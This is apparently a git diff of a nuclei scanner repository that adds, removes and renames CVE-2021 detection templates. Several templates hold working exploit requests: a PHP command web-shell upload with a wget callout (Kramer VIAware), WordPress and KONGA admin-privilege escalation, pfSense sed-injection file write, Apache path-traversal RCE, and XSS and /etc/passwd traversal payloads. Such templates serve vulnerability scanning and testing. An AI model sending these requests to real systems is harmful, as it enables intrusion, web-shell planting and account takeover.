Time" - - "Firmware Version" - - "Firmware Build Time" - condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-33564.yaml b/nuclei-templates/CVE-2021/CVE-2021-33564.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-33564.yaml rename to nuclei-templates/CVE-2021/CVE-2021-33564.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-3377.yaml b/nuclei-templates/CVE-2021/CVE-2021-3377.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3377.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3377.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-34370.yaml b/nuclei-templates/CVE-2021/CVE-2021-34370.yaml deleted file mode 100644 index 13b713dd9e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-34370.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2021-34370 - -info: - name: Accela Civic Platform 21.1 - Open Redirect & XSS - author: 0x_Akoko - description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 - reference: https://www.exploit-db.com/exploits/49990 - severity: medium - tags: xss,redirect,cves - -requests: - - method: GET - path: - - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-34473.yaml b/nuclei-templates/CVE-2021/CVE-2021-34473.yaml deleted file mode 100644 index 2ddc4114c6..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-34473.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-34473 - -info: - name: Exchange Server - Remote Code Execution - author: arcc,intx0x80,dwisiswant0,r3dg33k - severity: critical - description: | - Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. - reference: - - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 - - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 - - https://nvd.nist.gov/vuln/detail/CVE-2021-34473 - remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-34473 - cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* - epss-score: 0.97375 - tags: cve,cve2021,ssrf,rce,exchange,kev - metadata: - max-request: 2 - -http: - - method: GET - path: - - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' - - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com' - - matchers: - - type: word - part: body - condition: or - words: - - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" - - "Exchange MAPI/HTTP Connectivity Endpoint" - -# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-34621.yaml b/nuclei-templates/CVE-2021/CVE-2021-34621.yaml new file mode 100644 index 0000000000..0c9e8e6232 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-34621.yaml @@ -0,0 +1,106 @@ +id: CVE-2021-34621 + +info: + name: WordPress ProfilePress wp-user-avatar plugin make admin users + author: 0xsapra + severity: critical + reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin + tags: cve,cve2021,wordpress,wp-plugin + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: application/json, text/javascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Connection: close + + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_username" + + {{randstr}} + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_email" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_password" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_password_present" + + true + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_first_name" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_last_name" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="_wp_http_referer" + + /wp/?page_id=18 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="pp_current_url" + + {{BaseURL}} + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="wp_capabilities[administrator]" + + 1 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="signup_form_id" + + 1 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="signup_referrer_page" + + + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="action" + + pp_ajax_signup + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="melange_id" + + + -----------------------------138742543134772812001999326589-- + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Connection: close + + action=pp_ajax_login&data=login_username={{randstr}}@example.com&login_password={{randstr}}@example.com + + - | + GET /wp-admin/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection: close + + redirects: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "welcome-panel" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-35265.yaml b/nuclei-templates/CVE-2021/CVE-2021-35265.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-35265.yaml rename to nuclei-templates/CVE-2021/CVE-2021-35265.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-35336.yaml b/nuclei-templates/CVE-2021/CVE-2021-35336.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-35336.yaml rename to nuclei-templates/CVE-2021/CVE-2021-35336.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-36356.yaml b/nuclei-templates/CVE-2021/CVE-2021-36356.yaml new file mode 100644 index 0000000000..fc0224ed28 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-36356.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-36356 +info: + name: Kramer VIAware - Remote Code Execution + author: gy741 + severity: critical + description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. + reference: + - https://www.exploit-db.com/exploits/50856 + - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 + - https://nvd.nist.gov/vuln/detail/CVE-2021-35064 + - https://write-up.github.io/kramerav/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-36356 + cwe-id: CWE-434 + tags: rce,viaware,cve,cve2021,kramer +requests: + - raw: + - | + POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php + - | + GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1 + Host: {{Hostname}} + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml b/nuclei-templates/CVE-2021/CVE-2021-36450.yaml deleted file mode 100644 index 7220501c25..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2021-36450 -info: - name: Verint 15.2 - Cross Site Scripting - author: atomiczsec - severity: medium - description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter. - reference: - - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 - - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 - - http://verint.com - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-36450 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Verint Sign-in" - verified: "true" - tags: cve,cve2021,xss,verint -requests: - - raw: - - | - GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 - Host: {{Hostname}} - - | - POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} - redirects: true - max-redirects: 2 - cookie-reuse: true - extractors: - - type: regex - part: header - internal: true - name: csrfp_login - group: 1 - regex: - - 'csrfp_login=([a-zA-Z0-9]+);' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">

Test

26" class="loginUserNameText' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-37416.yaml b/nuclei-templates/CVE-2021/CVE-2021-37416.yaml deleted file mode 100644 index 3f2ac17b38..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-37416.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-37416 -info: - name: Zoho ManageEngine ADSelfService Plus - Reflected XSS - author: edoardottt - severity: medium - description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-37416 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"ManageEngine" - verified: true - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 - - https://blog.stmcyber.com/vulns/cve-2021-37416/ - tags: cve,cve2021,zoho,xss -requests: - - method: GET - path: - - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/html" - - type: word - part: body - words: - - ">" - - "adsf/js/" - condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-37704.yaml b/nuclei-templates/CVE-2021/CVE-2021-37704.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-37704.yaml rename to nuclei-templates/CVE-2021/CVE-2021-37704.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-37859.yaml b/nuclei-templates/CVE-2021/CVE-2021-37859.yaml new file mode 100644 index 0000000000..cade6b445d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-37859.yaml @@ -0,0 +1,22 @@ +id: CVE-2021-37859 +info: + name: Mattermost XSS + author: 0x_Akoko + severity: medium + description: reflected Cross-Site Scripting (XSS) via the OAuth flow + tags: cve,cve2021,xss +requests: + - method: GET + path: + - "{{BaseURL}}/oauth/shielder/mobile_login?redirect_to=%22%3E%3Cimg%20src%3D%22%22%20onerror%3D%22alert(document.domain)%22%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + condition: and + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-38647.yaml b/nuclei-templates/CVE-2021/CVE-2021-38647.yaml deleted file mode 100644 index d9bfd21edc..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-38647.yaml +++ /dev/null @@ -1,95 +0,0 @@ -id: CVE-2021-38647 - -info: - name: CVE-2021-38647 - author: hackergautam - severity: critical - description: Azure Open Management Infrastructure RCE (OMIGOD) - reference: - - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 - - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647 - - https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution - tags: cve,cve2021,omigod,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-38647 - cwe-id: CWE-94 - -requests: - - raw: - - | - POST /wsman HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/soap+xml;charset=UTF-8 - - - - http://{{Hostname}}:5985/wsman/ - http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem - - http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous - - http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript - 102400 - uuid:f0527ac3-e333-4966-9504-1104dfd5d520 - PT1M30S - - - - - root/scx - - - - - ZWNobyAiIgplY2hvICJvbWlnb2QiCgo= - - 0 - true - - - - - - | - POST /wsman HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/soap+xml;charset=UTF-8 - - - - http://{{Hostname}}:5986/wsman/ - http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem - - http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous - - http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript - 102400 - uuid:f0527ac3-e333-4966-9504-1104dfd5d520 - PT1M30S - - - - - root/scx - - - - - ZWNobyAiIgplY2hvICJvbWlnb2QiCgo= - - 0 - true - - - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'omigod' \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-38702.yaml b/nuclei-templates/CVE-2021/CVE-2021-38702.yaml new file mode 100644 index 0000000000..4c1fde131c --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-38702.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-38702 + +info: + name: Cyberoam NetGenie Cross-Site Scripting + author: geeknik + severity: medium + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. + reference: + - https://seclists.org/fulldisclosure/2021/Aug/20 + - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 + - http://www.cyberoamworks.com/NetGenie-Home.asp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-38702 + cwe-id: CWE-79 + tags: cve,cve2021,cyberoam,netgenie,xss,router + +requests: + - method: GET + path: + - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 + +# Enhanced by cs on 2022/04/01 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39211.yaml b/nuclei-templates/CVE-2021/CVE-2021-39211.yaml deleted file mode 100644 index 0847c7cf42..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39211.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2021-39211 -info: - name: GLPI Telemetry Disclosure - author: dogasantos,noraj - severity: medium - description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 - - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 - - https://github.com/glpi-project/glpi/releases/tag/9.5.6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-39211 - cwe-id: CWE-668,CWE-200 - tags: cve,cve2021,glpi,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/ajax/telemetry.php" - - "{{BaseURL}}/glpi/ajax/telemetry.php" - matchers-condition: and - matchers: - - type: word - words: - - '"uuid":' - - '"glpi":' - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39320.yaml b/nuclei-templates/CVE-2021/CVE-2021-39320.yaml deleted file mode 100644 index 9efe2e0d70..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39320.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2021-39320 -info: - name: WordPress underConstruction Plugin< 1.19 - Reflected Cross-Site Scripting - author: dhiyaneshDK - severity: medium - description: "The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path." - reference: - - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 - - https://nvd.nist.gov/vuln/detail/CVE-2021-39320 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-39320 - cwe-id: CWE-79 - tags: wordpress,xss,cve,cve2021,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40438.yaml b/nuclei-templates/CVE-2021/CVE-2021-40438.yaml deleted file mode 100644 index 6d8f0e3541..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40438.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-40438 - -info: - name: Apache <= 2.4.48 Mod_Proxy SSRF - author: pdteam - severity: critical - description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. - reference: - - https://firzen.de/building-a-poc-for-cve-2021-40438 - - https://httpd.apache.org/security/vulnerabilities_24.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 - remediation: Upgrade to Apache version 2.4.49 or later. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9 - cve-id: CVE-2021-40438 - cwe-id: CWE-918 - tags: cve,cve2021,ssrf,apache,mod-proxy - -requests: - - method: GET - path: - - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://interact.sh/' - - redirects: true - max-redirects: 2 - matchers: - - type: word - words: - - "Interactsh Server" - - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40856.yaml b/nuclei-templates/CVE-2021/CVE-2021-40856.yaml deleted file mode 100644 index 3499f2bcd8..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40856.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2021-40856 - -info: - name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass - author: gy741 - severity: high - description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-40856 - - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass - - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses - - http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-40856 - cwe-id: CWE-287 - tags: cve,cve2021,comfortel,auth-bypass,auerswald - -requests: - - raw: - - | - GET /about/../tree?action=get HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"TYPE"' - - '"ITEMS"' - - '"COUNT"' - condition: and - - - type: word - part: header - words: - - application/json - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/CVE-2021/cve-2021-40868.yaml b/nuclei-templates/CVE-2021/CVE-2021-40868.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-40868.yaml rename to nuclei-templates/CVE-2021/CVE-2021-40868.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40978.yaml b/nuclei-templates/CVE-2021/CVE-2021-40978.yaml deleted file mode 100644 index 34a4663e8d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40978.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-40978 - -info: - name: MKdocs 1.2.2 - Directory Traversal - author: pikpikcu - severity: high - description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited. - reference: - - https://github.com/mkdocs/mkdocs/pull/2604 - - https://github.com/nisdn/CVE-2021-40978 - - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-40978 - cwe-id: CWE-22 - tags: cve,cve2021,mkdocs,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41282.yaml b/nuclei-templates/CVE-2021/CVE-2021-41282.yaml deleted file mode 100644 index 4b5ec0cb6f..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41282.yaml +++ /dev/null @@ -1,66 +0,0 @@ -id: CVE-2021-41282 - -info: - name: pfSense - Arbitrary File Write - author: cckuailong - severity: high - description: | - diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. - remediation: | - Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later. - reference: - - https://www.shielder.it/advisories/pfsense-remote-command-execution/ - - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/ - - https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc - - https://nvd.nist.gov/vuln/detail/CVE-2021-41282 - - https://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2021-41282 - cwe-id: CWE-74 - epss-score: 0.97375 - epss-percentile: 0.99887 - cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* - metadata: - max-request: 4 - vendor: pfsense - product: pfsense - tags: cve,cve2021,pfsense,rce,authenticated - -http: - - raw: - - | - GET /index.php HTTP/1.1 - Host: {{Hostname}} - - | - POST /index.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - __csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login= - - | - GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1 - Host: {{Hostname}} - - | - GET /test.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')" - - "status_code==200" - condition: and - - extractors: - - type: regex - name: csrf_token - group: 1 - regex: - - '(sid:[a-z0-9,;:]+)' - internal: true - part: body - -# digest: 4a0a00473045022100ef48291f3c4ea905bd452d70fd25a0487084b11dde0b4eaf171e5281be471c61022063e638ebe2f6aede97a5ee59650bc2f8786420e2f18a9508b13d8d400da4c7c4:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2021/cve-2021-41653.yaml b/nuclei-templates/CVE-2021/CVE-2021-41653.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41653.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41653.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41773.yaml b/nuclei-templates/CVE-2021/CVE-2021-41773.yaml deleted file mode 100644 index bf20e22be5..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41773.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: CVE-2021-41773 -info: - name: RCE in Apache HTTP Server 2.4.49 - author: RafaelCaria - severity: critical - tags: cve,cve2021,rce - -requests: - - method: POST - path: - - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' - body: 'echo;id' - - matchers: - - type: regex - part: body - regex: - - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b" diff --git a/nuclei-templates/CVE-2021/cve-2021-41878.yaml b/nuclei-templates/CVE-2021/CVE-2021-41878.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41878.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41878.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-42192.yaml b/nuclei-templates/CVE-2021/CVE-2021-42192.yaml new file mode 100644 index 0000000000..0f18b9f2d6 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-42192.yaml @@ -0,0 +1,73 @@ +id: CVE-2021-42192 +info: + name: KONGA 0.14.9 - Privilege Escalation + author: rschio + severity: high + description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter. + reference: + - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html + - https://www.exploit-db.com/exploits/50521 + - hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192 + - https://docs.google.com/document/d/1-YU9zWiDVUps3Mb6zos3996yvZ48vW_vfOvaJLLHc4I/edit?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-42192 + cwe-id: CWE-269 + tags: cve,cve2021,konga,authenticated +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"password": "{{password}}", "identifier": "{{username}}"} + - | + POST /api/user/{{id}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Content-Type: application/json;charset=utf-8 + + {"token": "{{token}}"} + - | + PUT /api/user/{{id}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Content-Type: application/json;charset=utf-8 + + {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"} + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_2, "\"admin\":false")' + - 'contains(body_3, "\"admin\":true")' + condition: and + - type: word + part: header + words: + - "application/json" + - type: status + status: + - 200 + extractors: + - type: regex + part: body + name: id + internal: true + group: 1 + regex: + - '"id":([0-9]+)' + - type: regex + part: body + name: token + internal: true + group: 1 + regex: + - '"token":"(.*)"' + +# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-42237.yaml b/nuclei-templates/CVE-2021/CVE-2021-42237.yaml new file mode 100644 index 0000000000..f1b98aa174 --- /dev/null +++ 